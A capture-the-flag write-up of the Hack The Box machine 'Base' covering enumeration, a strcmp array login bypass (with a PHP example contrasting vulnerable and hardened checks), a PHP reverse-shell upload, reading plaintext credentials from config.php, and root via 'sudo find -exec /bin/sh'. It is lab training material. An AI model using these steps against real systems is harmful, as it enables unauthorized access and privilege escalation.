Hack The Box: Starting Point - Base (Tier 2)


Base



Enumeration

nmap reveals two TCP ports: 22 and 80.

Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
|   256 65:0c:f7:db:42:03:46:07:f2:12:89:fe:11:20:2c:53 (ECDSA)
|_  256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: Welcome to Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visiting the website, we find a login page. The login link points to login/login.php. Due to a misconfiguration (directory listing is enabled), we can see the contents of the login/ directory by visiting http://<ip>/login/:



Initial Foothold

Specifically, we find a leftover Vim swap file of the login page, login.php.swp. The swap file contains the PHP source in clear text, including the line

(strcmp($password, $_POST['password']) == 0)

which performs the password check. A quick Google search for “strcmp” and “sql injection” leads to a blog post which shows that the login can be circumvented by submitting the password as an array, i.e. passing password[] as the parameter name:


and with this, we are in:

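Why the password[] trick defeats the strcmp() check above, and how the comparison should be written instead, as an added example that is not code from the box or from the referenced blog post. It assumes PHP 7 semantics (the Apache 2.4.29 / OpenSSH 7.6p1 versions point at Ubuntu 18.04, whose default PHP is 7.2) and uses a constructed placeholder password, not the box's credentials.

```php
<?php
// Added example, not the box's code. PHP 7.x semantics are assumed:
// on PHP 8, strcmp() with an array argument throws a TypeError instead.

// Vulnerable form, equivalent to the line leaked in login.php.swp.
// A form field named password[] arrives in $_POST as an array. In PHP 7,
// strcmp() with a non-string argument emits a warning and returns NULL, and
// NULL == 0 is true under loose comparison, so the check passes without
// the attacker knowing the password.
function vulnerable_login(string $stored, $submitted): bool
{
    return (@strcmp($stored, $submitted) == 0);   // @ only hides the warning
}

// Hardened form: insist on a string, keep a password hash rather than the
// plaintext that config.php held, and compare with password_verify(), which
// is constant-time and always returns a bool (never NULL).
function hardened_login(string $storedHash, $submitted): bool
{
    if (!is_string($submitted)) {
        return false;                 // arrays, null, ints: reject outright
    }
    return password_verify($submitted, $storedHash);
}

// Constructed demo input; PLACEHOLDER, not the box's credentials.
$stored     = 'placeholder-password-for-demo';
$storedHash = password_hash($stored, PASSWORD_DEFAULT);

var_dump(vulnerable_login($stored, 'wrong-guess'));   // honest wrong guess
var_dump(vulnerable_login($stored, ['x']));           // the array bypass
var_dump(hardened_login($storedHash, ['x']));         // same input, rejected
var_dump(hardened_login($storedHash, 'wrong-guess'));
var_dump(hardened_login($storedHash, $stored));
```

Run it with `php example.php`; the second call is the only one where the vulnerable check accepts a value that is not the password.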


We are directed to an uploads page. The upload itself does not seem to be restricted: any file type can be uploaded. So let’s upload a PHP reverse shell, for example the one from /usr/share/webshells/PHP. It works, but we still need to find out where the files are stored. Here I needed to check the walkthrough, because I was only trying with the wordlists from /usr/share/wordlists/dirbuster. However, for this test /usr/share/wordlists/dirb/ is the way to go:


We find that the files are stored in the _uploaded directory (which, unfortunately, is not in the dirbuster wordlists). So when we upload the file and open it in the browser, we get a shell:


We can upgrade it to an interactive TTY with python -c 'import pty; pty.spawn("/bin/bash")'.


Now let’s look around on the host. I tried to run LinEnum, but it didn’t reveal anything interesting unfortunately. However, in the web root we can check the contents of login/config.php:

www-data@base:/var/www/html/login$ cat config.php
cat config.php
<?php
$username = "admin";
$password = "thisisagoodpassword";

And we find the password “thisisagoodpassword”, which is reused for the local user john and lets us switch to that account. As john, we can read the user.txt file.


Privilege Escalation

The output of sudo -l reveals that john can run the /usr/bin/find command as root:

$ sudo -l
[sudo] password for john: thisisagoodpassword

Matching Defaults entries for john on base:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on base:
    (root : root) /usr/bin/find

After checking GTFOBins, we run the following command to become root:

$ sudo find . -exec /bin/sh \; -quit

And with this, we can read the root flag as well.